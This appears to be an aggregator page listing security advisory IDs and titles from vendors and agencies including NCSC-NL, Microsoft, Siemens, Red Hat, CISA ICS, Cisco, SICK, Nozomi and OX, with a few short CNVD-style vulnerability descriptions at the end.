ncsc-2025-0053 Kwetsbaarheden verholpen in Fortinet FortiSwitch, FortiManager, FortiAnalyzer, FortiOS en FortiProxy 7 days ago 1 day ago
ncsc-2025-0004 Kwetsbaarheden verholpen in SonicWall SonicOS 1 month ago 1 day ago
ncsc-2025-0061 Kwetsbaarheden verholpen in Siemens producten 5 days ago 5 days ago
ncsc-2025-0060 Kwetsbaarheid verholpen in Veeam 6 days ago 6 days ago
ncsc-2025-0059 Kwetsbaarheid verholpen in Fortinet FortiOS 6 days ago 6 days ago
ncsc-2025-0058 Kwetsbaarheden verholpen in Palo Alto Networks PAN-OS 6 days ago 6 days ago
ncsc-2025-0057 Kwetsbaarheden verholpen in GitLab CE/EE 6 days ago 6 days ago
ncsc-2025-0056 Kwetsbaarheden verholpen in Schneider Electric ASCO 6 days ago 6 days ago
ncsc-2025-0055 Kwetsbaarheid verholpen in CrowdStrike Falcon sensor 6 days ago 6 days ago
ncsc-2025-0054 Kwetsbaarheden verholpen in Adobe Commerce en Magento 6 days ago 6 days ago
ncsc-2025-0052 Kwetsbaarheden verholpen in Ivanti Connect Secure en Ivanti Policy Secure 7 days ago 7 days ago
ncsc-2025-0050 Kwetsbaarheden verholpen in Microsoft Office 7 days ago 7 days ago
ncsc-2025-0049 Kwetsbaarheden verholpen in Microsoft Visual Studio 7 days ago 7 days ago
ncsc-2025-0048 Kwetsbaarheden verholpen in Microsoft Azure 7 days ago 7 days ago
ncsc-2025-0047 Kwetsbaarheden verholpen in Microsoft Windows 7 days ago 7 days ago
ncsc-2025-0046 Kwetsbaarheid verholpen in Apple iOS en iPadOS 8 days ago 8 days ago
ncsc-2025-0045 Kwetsbaarheden verholpen in SAP producten 8 days ago 8 days ago
ncsc-2025-0043 Kwetsbaarheden verholpen in Cisco IOS, IOS XE en IOS XR Software 12 days ago 8 days ago
ncsc-2025-0041 Kwetsbaarheden verholpen in F5 BIG-IP 12 days ago 8 days ago
ncsc-2025-0044 Kwetsbaarheden verholpen in Cisco Identity Services Engine 12 days ago 12 days ago
ncsc-2025-0042 Kwetsbaarheden verholpen in Cisco AsyncOS Software 12 days ago 12 days ago
ncsc-2025-0040 Kwetsbaarheden verholpen in Mozilla Firefox en Thunderbird 12 days ago 12 days ago
ncsc-2025-0039 Kwetsbaarheden verholpen in Google Android en Samsung Mobile 15 days ago 15 days ago
ncsc-2025-0038 Kwetsbaarheden verholpen in Zimbra Collaboration 15 days ago 15 days ago
ncsc-2025-0037 Kwetsbaarheden verholpen in VMware Aria Operations 19 days ago 19 days ago
ncsc-2025-0036 Kwetsbaarheden verholpen in Rockwell Automation FactoryTalk 21 days ago 21 days ago
ncsc-2025-0035 Kwetsbaarheden verholpen in Rockwell Automation FactoryTalk 21 days ago 21 days ago
ncsc-2025-0034 Kwetsbaarheden verholpen in Apple iPadOS en iOS 22 days ago 22 days ago
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
msrc_cve-2025-21385 Microsoft Purview Information Disclosure Vulnerability 1 month ago 1 month ago
msrc_cve-2025-21380 Azure Marketplace SaaS Resources Information Disclosure Vulnerability 1 month ago 1 month ago
msrc_cve-2024-43594 Microsoft System Center Elevation of Privilege Vulnerability 2 months ago 1 month ago
msrc_cve-2024-49051 Microsoft PC Manager Elevation of Privilege Vulnerability 3 months ago 1 month ago
msrc_cve-2024-43601 Visual Studio Code for Linux Remote Code Execution Vulnerability 4 months ago 1 month ago
msrc_cve-2024-43600 Microsoft Office Elevation of Privilege Vulnerability 2 months ago 1 month ago
msrc_cve-2013-3900 WinVerifyTrust Signature Validation Vulnerability 3 years ago 1 month ago
msrc_cve-2024-49128 Windows Remote Desktop Services Remote Code Execution Vulnerability 2 months ago 2 months ago
msrc_cve-2024-49116 Windows Remote Desktop Services Remote Code Execution Vulnerability 2 months ago 2 months ago
msrc_cve-2024-49147 Microsoft Update Catalog Elevation of Privilege Vulnerability 2 months ago 2 months ago
msrc_cve-2024-49071 Windows Defender Information Disclosure Vulnerability 2 months ago 2 months ago
msrc_cve-2024-49069 Microsoft Excel Remote Code Execution Vulnerability 2 months ago 2 months ago
msrc_cve-2024-43451 NTLM Hash Disclosure Spoofing Vulnerability 3 months ago 2 months ago
msrc_cve-2024-38183 GroupMe Elevation of Privilege Vulnerability 5 months ago 2 months ago
msrc_cve-2024-49112 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability 2 months ago 2 months ago
msrc_cve-2024-49142 Microsoft Access Remote Code Execution Vulnerability 2 months ago 2 months ago
msrc_cve-2024-49138 Windows Common Log File System Driver Elevation of Privilege Vulnerability 2 months ago 2 months ago
msrc_cve-2024-49132 Windows Remote Desktop Services Remote Code Execution Vulnerability 2 months ago 2 months ago
msrc_cve-2024-49129 Windows Remote Desktop Gateway (RD Gateway) Denial of Service Vulnerability 2 months ago 2 months ago
msrc_cve-2024-49127 Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability 2 months ago 2 months ago
msrc_cve-2024-49126 Windows Local Security Authority Subsystem Service (LSASS) Remote Code Execution Vulnerability 2 months ago 2 months ago
msrc_cve-2024-49125 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability 2 months ago 2 months ago
msrc_cve-2024-49124 Lightweight Directory Access Protocol (LDAP) Client Remote Code Execution Vulnerability 2 months ago 2 months ago
msrc_cve-2024-49123 Windows Remote Desktop Services Remote Code Execution Vulnerability 2 months ago 2 months ago
msrc_cve-2024-49122 Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability 2 months ago 2 months ago
msrc_cve-2024-49121 Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability 2 months ago 2 months ago
msrc_cve-2024-49120 Windows Remote Desktop Services Remote Code Execution Vulnerability 2 months ago 2 months ago
msrc_cve-2024-49119 Windows Remote Desktop Services Remote Code Execution Vulnerability 2 months ago 2 months ago
msrc_cve-2024-49118 Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability 2 months ago 2 months ago
msrc_cve-2024-49117 Windows Hyper-V Remote Code Execution Vulnerability 2 months ago 2 months ago
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
ssa-900277 SSA-900277: MODEL File Parsing Vulnerability in Tecnomatix Plant Simulation before V2302.0012 and V2024.0001 8 months ago 8 months ago
ssa-879734 SSA-879734: Multiple Vulnerabilities in SCALANCE XM-400/XR-500 before V6.6.1 8 months ago 8 months ago
ssa-871704 SSA-871704: Multiple Vulnerabilities in SICAM Products 9 months ago 8 months ago
ssa-832273 SSA-832273: Multiple Vulnerabilities in Fortigate NGFW before V7.4.3 on RUGGEDCOM APE1808 devices 11 months ago 8 months ago
ssa-771940 SSA-771940: X_T File Parsing Vulnerabilities in Teamcenter Visualization and JT2Go 8 months ago 8 months ago
ssa-753746 SSA-753746: Denial of Service Vulnerabilities in SIMATIC WinCC Affecting Other SIMATIC Software Products 1 year ago 8 months ago
ssa-711309 SSA-711309: Denial of Service Vulnerability in the OPC UA Implementations of SIMATIC Products 1 year ago 8 months ago
ssa-690517 SSA-690517: Multiple Vulnerabilities in SCALANCE W700 802.11 AX Family 8 months ago 8 months ago
ssa-625862 SSA-625862: Multiple Vulnerabilities in Third-Party Components in SIMATIC CP 1542SP-1 and CP 1543SP-1 before V2.3 8 months ago 8 months ago
ssa-620338 SSA-620338: Buffer Overflow Vulnerability in SICAM AK3 / BC / TM 8 months ago 8 months ago
ssa-599968 SSA-599968: Denial-of-Service Vulnerability in Profinet Devices 3 years ago 8 months ago
ssa-566905 SSA-566905: Multiple Denial of Service Vulnerabilities in the Webserver of Industrial Products 1 year ago 8 months ago
ssa-540640 SSA-540640: Improper Privilege Management Vulnerability in Mendix Runtime 8 months ago 8 months ago
ssa-482757 SSA-482757: Missing Immutable Root of Trust in S7-1500 CPU devices 2 years ago 8 months ago
ssa-481506 SSA-481506: Information Disclosure Vulnerability in SIMATIC S7-200 SMART Devices 8 months ago 8 months ago
ssa-446448 SSA-446448: Denial of Service Vulnerability in PROFINET Stack Integrated on Interniche Stack 2 years ago 8 months ago
ssa-407785 SSA-407785: Multiple X_T File Parsing Vulnerabilities in Parasolid and Teamcenter Visualization 1 year ago 8 months ago
ssa-398330 SSA-398330: Vulnerabilities in the additional GNU/Linux subsystem of the SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP V3.1 1 year ago 8 months ago
ssa-353002 SSA-353002: Multiple Vulnerabilities in SCALANCE XB-200 / XC-200 / XP-200 / XF-200BA / XR-300WG Family 11 months ago 8 months ago
ssa-341067 SSA-341067: Multiple vulnerabilities in third-party components in ST7 ScadaConnect before V1.1 8 months ago 8 months ago
ssa-337522 SSA-337522: Multiple Vulnerabilities in TIM 1531 IRC before V2.4.8 8 months ago 8 months ago
ssa-319319 SSA-319319: Denial of Service Vulnerability in TIA Administrator 8 months ago 8 months ago
ssa-238730 SSA-238730: Out-of-Bounds Write Vulnerabilities in SITOP UPS1600 before V2.5.4 8 months ago 8 months ago
ssa-196737 SSA-196737: Multiple Vulnerabilities in SINEC Traffic Analyzer before V1.2 8 months ago 8 months ago
ssa-093430 SSA-093430: Multiple Vulnerabilities in SIMATIC RTLS Locating Manager before V3.0 9 months ago 8 months ago
ssa-035466 SSA-035466: Incorrect Permission Assignment in SICAM PAS/PQS 1 year ago 8 months ago
ssa-024584 SSA-024584: Authentication Bypass Vulnerability in PowerSys before V3.11 8 months ago 8 months ago
SSA-900277 SSA-900277: MODEL File Parsing Vulnerability in Tecnomatix Plant Simulation before V2302.0012 and V2024.0001 8 months ago 8 months ago
SSA-879734 SSA-879734: Multiple Vulnerabilities in SCALANCE XM-400/XR-500 before V6.6.1 8 months ago 8 months ago
SSA-871704 SSA-871704: Multiple Vulnerabilities in SICAM Products 9 months ago 8 months ago
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
rhsa-2025:1448 Red Hat Security Advisory: RHOAI 2.17.0 - Red Hat OpenShift AI 5 days ago 59 minutes ago
rhsa-2025:1335 Red Hat Security Advisory: RHUI 4.11 security, bugfix, and enhancement update 7 days ago 59 minutes ago
rhsa-2025:0012 Red Hat Security Advisory: python-requests security update 1 month ago 59 minutes ago
rhsa-2024:9988 Red Hat Security Advisory: RHOSP 17.1.4 (python-requests) security update 2 months ago 1 hour ago
rhsa-2024:4522 Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.4 Product Security and Bug Fix Update 7 months ago 1 hour ago
rhsa-2024:3781 Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.4 Product Security and Bug Fix Update 8 months ago 1 hour ago
rhsa-2025:1609 Red Hat Security Advisory: Cluster Observability Operator 1.0.0 1 day ago 1 hour ago
rhsa-2025:0715 Red Hat Security Advisory: Red Hat OpenShift Builds 1.1 22 days ago 1 hour ago
rhsa-2025:0754 Red Hat Security Advisory: Red Hat OpenShift Builds 1.2 22 days ago 1 hour ago
rhsa-2025:0905 Red Hat Security Advisory: RHOAI 2.16.0 - Red Hat OpenShift AI 15 days ago 1 hour ago
rhsa-2025:0827 Red Hat Security Advisory: OpenShift Container Platform 4.16.33 security and extras update 13 days ago 1 hour ago
rhsa-2025:1468 Red Hat Security Advisory: ACS 4.4 enhancement and security update 5 days ago 1 hour ago
rhsa-2025:0646 Red Hat Security Advisory: OpenShift Container Platform 4.15.44 security update 20 days ago 1 hour ago
rhsa-2025:0832 Red Hat Security Advisory: OpenShift Container Platform 4.12.72 bug fix and security update 13 days ago 1 hour ago
rhsa-2025:1332 Red Hat Security Advisory: Gatekeeper v3.15.3 6 days ago 1 hour ago
rhsa-2025:0840 Red Hat Security Advisory: OpenShift Container Platform 4.14.46 security update 13 days ago 1 hour ago
rhsa-2025:0645 Red Hat Security Advisory: OpenShift Container Platform 4.15.44 security update 20 days ago 1 hour ago
rhsa-2025:0831 Red Hat Security Advisory: OpenShift Container Platform 4.12.72 security and extras update 13 days ago 1 hour ago
rhsa-2025:1333 Red Hat Security Advisory: Gatekeeper v3.14.3 6 days ago 1 hour ago
rhsa-2025:0839 Red Hat Security Advisory: OpenShift Container Platform 4.14.46 security update 13 days ago 1 hour ago
rhsa-2025:1324 Red Hat Security Advisory: RHTAS 1.1.1 - Red Hat Trusted Artifact Signer Release 7 days ago 1 hour ago
rhba-2025:0409 Red Hat Bug Fix Advisory: Red Hat Developer Hub 1.4.1 release. 30 days ago 1 hour ago
rhsa-2025:0821 Red Hat Security Advisory: RHSA: Submariner 0.17.5 - bug and security fixes 20 days ago 1 hour ago
rhsa-2025:0650 Red Hat Security Advisory: OpenShift Container Platform 4.16.32 bug fix and security update 21 days ago 1 hour ago
rhsa-2025:0485 Red Hat Security Advisory: cert-manager Operator for Red Hat OpenShift 1.15.0 29 days ago 1 hour ago
rhsa-2025:1334 Red Hat Security Advisory: ACS 4.5 enhancement and security update 7 days ago 1 hour ago
rhsa-2025:1289 Red Hat Security Advisory: RHTAS 1.1.1 - Red Hat Trusted Artifact Signer Release 8 days ago 1 hour ago
rhsa-2025:0370 Red Hat Security Advisory: Red Hat build of OpenTelemetry 3.4 release 1 month ago 1 hour ago
rhsa-2025:0875 Red Hat Security Advisory: OpenShift Container Platform 4.17.15 security and extras update 14 days ago 1 hour ago
rhsa-2025:0785 Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.11.5 bug fixes and container updates 21 days ago 1 hour ago
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
icsa-25-016-05 Fuji Electric Alpha5 SMART 1 month ago 1 month ago
icsa-25-010-03 Delta Electronics DRASimuCAD (Update A) 1 month ago 1 month ago
icsa-24-191-05 Johnson Controls Inc. Software House C●CURE 9000 (Update A) 7 months ago 1 month ago
icsa-24-058-01 Mitsubishi Electric Multiple Factory Automation Products (Update A) 11 months ago 1 month ago
icsa-24-030-02 Mitsubishi Electric FA Engineering Software Products (Update B) 1 year ago 1 month ago
icsa-25-016-03 Siemens Siveillance Video Camera 1 month ago 1 month ago
icsa-25-014-04 Belledonne Communications Linphone-Desktop 1 month ago 1 month ago
icsa-25-016-04 Siemens SIPROTEC 5 Products 1 month ago 1 month ago
icsa-25-016-02 Siemens Industrial Edge Management 1 month ago 1 month ago
icsa-25-016-01 Siemens Mendix LDAP 1 month ago 1 month ago
icsa-24-319-07 Siemens Engineering Platforms 3 months ago 1 month ago
icsa-24-284-10 Siemens SIMATIC S7-1500 CPUs 4 months ago 1 month ago
icsa-24-284-01 Siemens SIMATIC S7-1500 and S7-1200 CPUs 4 months ago 1 month ago
icsa-24-256-14 Siemens SIMATIC SCADA and PCS 7 Systems 5 months ago 1 month ago
icsa-24-256-08 Siemens Industrial Products 5 months ago 1 month ago
icsa-24-256-05 Siemens Mendix Runtime 5 months ago 1 month ago
icsa-24-256-03 Siemens User Management Component (UMC) 5 months ago 1 month ago
icsa-24-193-05 Siemens SCALANCE, RUGGEDCOM, SIPLUS, and SINEC 7 months ago 1 month ago
icsa-24-165-12 Siemens SCALANCE W700 8 months ago 1 month ago
icsa-24-102-02 Siemens SIMATIC WinCC 10 months ago 1 month ago
icsa-23-348-10 Siemens SIMATIC S7-1500 CPU 1 year ago 1 month ago
icsa-23-348-03 Siemens User Management Component (UMC) 1 year ago 1 month ago
icsa-23-257-01 Siemens SIMATIC, SIPLUS Products 1 year ago 1 month ago
icsa-23-012-08 Siemens S7-1500 CPU devices 2 years ago 1 month ago
icsa-22-349-04 Siemens SCALANCE Products 2 years ago 1 month ago
icsa-22-104-06 Siemens PROFINET Stack Integrated on Interniche Stack 2 years ago 1 month ago
icsa-20-105-08 Siemens KTK, SIDOOR, SIMATIC, and SINAMICS 4 years ago 1 month ago
icsa-24-345-06 Rockwell Automation Arena (Update A) 2 months ago 1 month ago
icsa-25-007-02 Nedap Librix Ecoreader 1 month ago 1 month ago
icsma-24-354-01 Ossur Mobile Logic Application 2 months ago 2 months ago
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
cisco-sa-ise-multivuls-ftw9aoxf Cisco Identity Services Engine Insecure Java Deserialization and Authorization Bypass Vulnerabilities 13 days ago 8 days ago
cisco-sa-esa-sma-wsa-multi-ykujhs34 Cisco Secure Email and Web Manager, Secure Email Gateway, and Secure Web Appliance Vulnerabilities 13 days ago 11 days ago
cisco-sa-nxos-image-sig-bypas-pqdrqvjl Cisco NX-OS Software Image Verification Bypass Vulnerability 2 months ago 12 days ago
cisco-sa-swa-range-bypass-2bsehysu Cisco Secure Web Appliance Range Request Bypass Vulnerability 13 days ago 13 days ago
cisco-sa-snmp-dos-sdxnsucw Cisco IOS, IOS XE, and IOS XR Software SNMP Denial of Service Vulnerabilities 13 days ago 13 days ago
cisco-sa-ise-xss-42tgsdmg Cisco Identity Services Engine Stored Cross-Site Scripting Vulnerabilities 13 days ago 13 days ago
cisco-sa-expressway-xss-uexuzrew Cisco Expressway Series Cross-Site Scripting Vulnerability 13 days ago 13 days ago
cisco-sa-esa-sma-xss-wck2wcug Cisco Secure Email and Web Manager and Secure Email Gateway Cross-Site Scripting Vulnerability 13 days ago 13 days ago
cisco-sa-esa-sma-wsa-snmp-inf-fqpvl8sx Cisco Secure Email and Web Manager, Secure Email Gateway, and Secure Web Appliance SNMP Polling Information Disclosure Vulnerability 13 days ago 13 days ago
cisco-sa-cmm-privesc-uy2vf8pc Cisco Meeting Management REST API Privilege Escalation Vulnerability 27 days ago 27 days ago
cisco-sa-clamav-ole2-h549rpha ClamAV OLE2 File Format Decryption Denial of Service Vulnerability 27 days ago 27 days ago
cisco-sa-bw-sip-dos-msysbrmt Cisco BroadWorks SIP Denial of Service Vulnerability 27 days ago 27 days ago
cisco-sa-thousandeyes-cert-pqtjuv9n Cisco ThousandEyes Endpoint Agent for MacOS and RoomOS Certificate Validation Vulnerability 1 month ago 1 month ago
cisco-sa-thousandeyes-cert-pqtJUv9N Cisco ThousandEyes Endpoint Agent for MacOS and RoomOS Certificate Validation Vulnerability 1 month ago 1 month ago
cisco-sa-nxos-image-sig-bypas-pQDRQvjL Cisco NX-OS Software Image Verification Bypass Vulnerability 2 months ago 12 days ago
cisco-sa-ap-dos-capwap-ddmczs4m Cisco Access Point Software Uncontrolled Resource Consumption Vulnerability 1 year ago 2 months ago
cisco-sa-ap-dos-capwap-DDMCZS4m Cisco Access Point Software Uncontrolled Resource Consumption Vulnerability 1 year ago 2 months ago
cisco-sa-swa-priv-esc-7uhpzscc Cisco Secure Web Appliance Privilege Escalation Vulnerability 7 months ago 2 months ago
cisco-sa-swa-priv-esc-7uHpZsCC Cisco Secure Web Appliance Privilege Escalation Vulnerability 7 months ago 2 months ago
cisco-sa-iosxr-load-infodisc-9rdor5fq Cisco IOS XR Software Bootloader Unauthenticated Information Disclosure Vulnerability 1 year ago 3 months ago
cisco-sa-iosxr-load-infodisc-9rdOr5Fq Cisco IOS XR Software Bootloader Unauthenticated Information Disclosure Vulnerability 1 year ago 3 months ago
cisco-sa-phone-infodisc-sbyqqvbg Cisco 7800, 8800, and 9800 Series Phones Information Disclosure Vulnerability 3 months ago 3 months ago
cisco-sa-phone-infodisc-sbyqQVbG Cisco 7800, 8800, and 9800 Series Phones Information Disclosure Vulnerability 3 months ago 3 months ago
cisco-sa-ndfc-sqli-cyppaxrl Cisco Nexus Dashboard Fabric Controller SQL Injection Vulnerability 3 months ago 3 months ago
cisco-sa-ndfc-sqli-CyPPAxrL Cisco Nexus Dashboard Fabric Controller SQL Injection Vulnerability 3 months ago 3 months ago
cisco-sa-mpp-xss-8tav2tvf Cisco 6800, 7800, 8800, and 9800 Series Phones with Multiplatform Firmware Stored Cross-Site Scripting Vulnerabilities 3 months ago 3 months ago
cisco-sa-mpp-xss-8tAV2TvF Cisco 6800, 7800, 8800, and 9800 Series Phones with Multiplatform Firmware Stored Cross-Site Scripting Vulnerabilities 3 months ago 3 months ago
cisco-sa-ise-multi-vulns-af544ed5 Cisco Identity Services Engine Vulnerabilities 3 months ago 3 months ago
cisco-sa-ise-multi-vulns-AF544ED5 Cisco Identity Services Engine Vulnerabilities 3 months ago 3 months ago
cisco-sa-ise-multi-vuln-dbqdwry Cisco Identity Services Engine Vulnerabilities 3 months ago 3 months ago
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
sca-2025-0001 Multiple vulnerabilities in SICK MEAC300 5 days ago 5 days ago
sca-2024-0003 Critical vulnerability in multiple SICK products 4 months ago 4 months ago
sca-2024-0001 Vulnerability in SICK Logistics Analytics Products and SICK Field Analytics 1 year ago 1 year ago
sca-2023-0011 Vulnerability in multiple SICK Flexi Soft Gateways 1 year ago 1 year ago
SCA-2023-0011 Vulnerability in multiple SICK Flexi Soft Gateways 1 year ago 1 year ago
sca-2023-0010 Vulnerabilities in SICK Application Processing Unit 1 year ago 1 year ago
SCA-2023-0010 Vulnerabilities in SICK Application Processing Unit 1 year ago 1 year ago
sca-2023-0008 Vulnerability in SICK SIM1012 1 year ago 1 year ago
SCA-2023-0008 Vulnerability in SICK SIM1012 1 year ago 1 year ago
sca-2023-0009 Vulnerability in Wibu-Systems CodeMeter Runtime affects multiple SICK products 1 year ago 1 year ago
SCA-2023-0009 Vulnerability in Wibu-Systems CodeMeter Runtime affects multiple SICK products 1 year ago 1 year ago
sca-2023-0007 Vulnerabilities in SICK LMS5xx 1 year ago 1 year ago
SCA-2023-0007 Vulnerabilities in SICK LMS5xx 1 year ago 1 year ago
sca-2023-0006 Vulnerabilities in SICK ICR890-4 1 year ago 1 year ago
SCA-2023-0006 Vulnerabilities in SICK ICR890-4 1 year ago 1 year ago
sca-2023-0005 Vulnerabilities in SICK EventCam App 1 year ago 1 year ago
SCA-2023-0005 Vulnerabilities in SICK EventCam App 1 year ago 1 year ago
sca-2023-0004 Vulnerabilities in SICK FTMg 1 year ago 1 year ago
SCA-2023-0004 Vulnerabilities in SICK FTMg 1 year ago 1 year ago
sca-2023-0003 Vulnerability in SICK Flexi Soft and Flexi Classic Gateways 1 year ago 1 year ago
SCA-2023-0003 Vulnerability in SICK Flexi Soft and Flexi Classic Gateways 1 year ago 1 year ago
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
nn-2023_17-01 Information disclosure via audit records for OpenAPI requests in Guardian/CMC before 23.4.1 10 months ago 10 months ago
nn-2023:17-01 Information disclosure via audit records for OpenAPI requests in Guardian/CMC before 23.4.1 10 months ago 10 months ago
NN-2023:17-01 Information disclosure via audit records for OpenAPI requests in Guardian/CMC before 23.4.1 10 months ago 10 months ago
nn-2024_1-01 DoS on IDS parsing of malformed Radius packets in Guardian before 23.4.1 10 months ago 10 months ago
nn-2024:1-01 DoS on IDS parsing of malformed Radius packets in Guardian before 23.4.1 10 months ago 10 months ago
NN-2024:1-01 DoS on IDS parsing of malformed Radius packets in Guardian before 23.4.1 10 months ago 10 months ago
nn-2023_12-01 Check Point IoT integration: WebSocket returns assets data without authentication in Guardian/CMC before 23.3.0 1 year ago 1 year ago
nn-2023:12-01 Check Point IoT integration: WebSocket returns assets data without authentication in Guardian/CMC before 23.3.0 1 year ago 1 year ago
NN-2023:12-01 Check Point IoT integration: WebSocket returns assets data without authentication in Guardian/CMC before 23.3.0 1 year ago 1 year ago
nn-2023_9-01 Authenticated SQL Injection on Query functionality in Guardian/CMC before 22.6.3 and 23.1.0 1 year ago 1 year ago
nn-2023_8-01 Session Fixation in Guardian/CMC before 22.6.2 1 year ago 1 year ago
nn-2023_7-01 DoS via SAML configuration in Guardian/CMC before 22.6.2 1 year ago 1 year ago
nn-2023_6-01 Partial DoS on Reports section due to null report name in Guardian/CMC before 22.6.2 1 year ago 1 year ago
nn-2023_5-01 Information disclosure via the debug function in assertions in Guardian/CMC before 22.6.2 1 year ago 1 year ago
nn-2023_4-01 Stored Cross-Site Scripting (XSS) in Threat Intelligence rules in Guardian/CMC before 22.6.2 1 year ago 1 year ago
nn-2023_3-01 Authenticated Blind SQL Injection on alerts count in Guardian/CMC before 22.6.2 1 year ago 1 year ago
nn-2023_2-01 Authenticated Blind SQL Injection on sorting in Guardian/CMC before 22.6.2 1 year ago 1 year ago
nn-2023_11-01 SQL Injection on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 1 year ago 1 year ago
nn-2023_10-01 DoS on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 1 year ago 1 year ago
nn-2023_1-01 Authenticated SQL Injection on Alerts in Guardian/CMC before 22.5.2 1 year ago 1 year ago
nn-2023:9-01 Authenticated SQL Injection on Query functionality in Guardian/CMC before 22.6.3 and 23.1.0 1 year ago 1 year ago
nn-2023:8-01 Session Fixation in Guardian/CMC before 22.6.2 1 year ago 1 year ago
nn-2023:7-01 DoS via SAML configuration in Guardian/CMC before 22.6.2 1 year ago 1 year ago
nn-2023:6-01 Partial DoS on Reports section due to null report name in Guardian/CMC before 22.6.2 1 year ago 1 year ago
nn-2023:5-01 Information disclosure via the debug function in assertions in Guardian/CMC before 22.6.2 1 year ago 1 year ago
nn-2023:4-01 Stored Cross-Site Scripting (XSS) in Threat Intelligence rules in Guardian/CMC before 22.6.2 1 year ago 1 year ago
nn-2023:3-01 Authenticated Blind SQL Injection on alerts count in Guardian/CMC before 22.6.2 1 year ago 1 year ago
nn-2023:2-01 Authenticated Blind SQL Injection on sorting in Guardian/CMC before 22.6.2 1 year ago 1 year ago
nn-2023:11-01 SQL Injection on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 1 year ago 1 year ago
nn-2023:10-01 DoS on IDS parsing of malformed asset fields in Guardian/CMC >= 22.6.0 before 22.6.3 and 23.1.0 1 year ago 1 year ago
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
oxas-adv-2024-0002 OX App Suite Security Advisory OXAS-ADV-2024-0002 11 months ago 9 months ago
OXAS-ADV-2024-0002 OX App Suite Security Advisory OXAS-ADV-2024-0002 11 months ago 9 months ago
oxas-adv-2024-0001 OX App Suite Security Advisory OXAS-ADV-2024-0001 1 year ago 9 months ago
OXAS-ADV-2024-0001 OX App Suite Security Advisory OXAS-ADV-2024-0001 1 year ago 9 months ago
oxas-adv-2023-0007 OX App Suite Security Advisory OXAS-ADV-2023-0007 1 year ago 1 year ago
OXAS-ADV-2023-0007 OX App Suite Security Advisory OXAS-ADV-2023-0007 1 year ago 1 year ago
oxas-adv-2023-0006 OX App Suite Security Advisory OXAS-ADV-2023-0006 1 year ago 1 year ago
oxas-adv-2023-0005 OX App Suite Security Advisory OXAS-ADV-2023-0005 1 year ago 1 year ago
oxas-adv-2023-0004 OX App Suite Security Advisory OXAS-ADV-2023-0004 1 year ago 1 year ago
oxas-adv-2023-0003 OX App Suite Security Advisory OXAS-ADV-2023-0003 1 year ago 1 year ago
oxas-adv-2023-0002 OX App Suite Security Advisory OXAS-ADV-2023-0002 1 year ago 1 year ago
oxas-adv-2023-0001 OX App Suite Security Advisory OXAS-ADV-2023-0001 2 years ago 1 year ago
oxas-adv-2022-0002 OX App Suite Security Advisory OXAS-ADV-2022-0002 2 years ago 1 year ago
oxas-adv-2022-0001 OX App Suite Security Advisory OXAS-ADV-2022-0001 2 years ago 1 year ago
OXAS-ADV-2023-0006 OX App Suite Security Advisory OXAS-ADV-2023-0006 1 year ago 1 year ago
OXAS-ADV-2023-0005 OX App Suite Security Advisory OXAS-ADV-2023-0005 1 year ago 1 year ago
OXAS-ADV-2023-0004 OX App Suite Security Advisory OXAS-ADV-2023-0004 1 year ago 1 year ago
OXAS-ADV-2023-0003 OX App Suite Security Advisory OXAS-ADV-2023-0003 1 year ago 1 year ago
OXAS-ADV-2023-0002 OX App Suite Security Advisory OXAS-ADV-2023-0002 1 year ago 1 year ago
OXAS-ADV-2023-0001 OX App Suite Security Advisory OXAS-ADV-2023-0001 2 years ago 1 year ago
OXAS-ADV-2022-0002 OX App Suite Security Advisory OXAS-ADV-2022-0002 2 years ago 1 year ago
OXAS-ADV-2022-0001 OX App Suite Security Advisory OXAS-ADV-2022-0001 2 years ago 1 year ago
Vulnerabilities are sorted by update time (recent to old).
ID Description
var-202407-2188 Siemens (China) Co., Ltd. is a company focusing on electrification, automation and digitalization. Many products of Siemens (China) Co., Ltd. have denial of service vulnerabilities. Attackers can exploit the vulnerabilities to cause abnormal processing of the device and crash. The device can only be restored by manually restarting the PLC.
var-202406-3119 Beijing StarNet Ruijie Network Technology Co., Ltd. EG3220 is a new generation of multi-service security gateway. Beijing StarNet Ruijie Network Technology Co., Ltd. EG3220 has a command execution vulnerability, which can be exploited by attackers to gain control of the server.
var-202407-1740 NBR6135-E is a router. Beijing Xingwang Ruijie Network Technology Co., Ltd. NBR6135-E has a command execution vulnerability, and attackers can exploit the vulnerability to execute commands.
var-202407-1417 Siemens (China) Co., Ltd. is a company focusing on electrification, automation and digitalization. Many products of Siemens (China) Co., Ltd. have denial of service vulnerabilities. Attackers can exploit the vulnerabilities to cause equipment shutdown and manually restart the PLC to recover.
var-202407-1103 Siemens (China) Co., Ltd. is a company focusing on electrification, automation and digitalization. Many products of Siemens (China) Co., Ltd. have denial of service vulnerabilities. Attackers can exploit the vulnerabilities to cause abnormal processing of the device and crash. The device can only be restored by manually restarting the PLC.
var-202407-0957 WinCC is a SCADA system suitable for all walks of life. It can access devices from mobile terminals, extract intelligent data, analyze data and make reports. Siemens (China) Co., Ltd. WinCC has a denial of service vulnerability, which can be exploited by attackers to cause denial of service.
var-202407-0819 SIMATIC S7-1500 is a modular control system suitable for various automation applications in the field of discrete automation. There is a denial of service vulnerability in SIMATIC S7-1500 of Siemens (China) Co., Ltd., which can be exploited by attackers to cause denial of service.
var-202407-0818 NBR6210-E is a router product. Beijing Xingwang Ruijie Network Technology Co., Ltd. NBR6210-E has a command execution vulnerability, which can be exploited by attackers to gain control of the server.
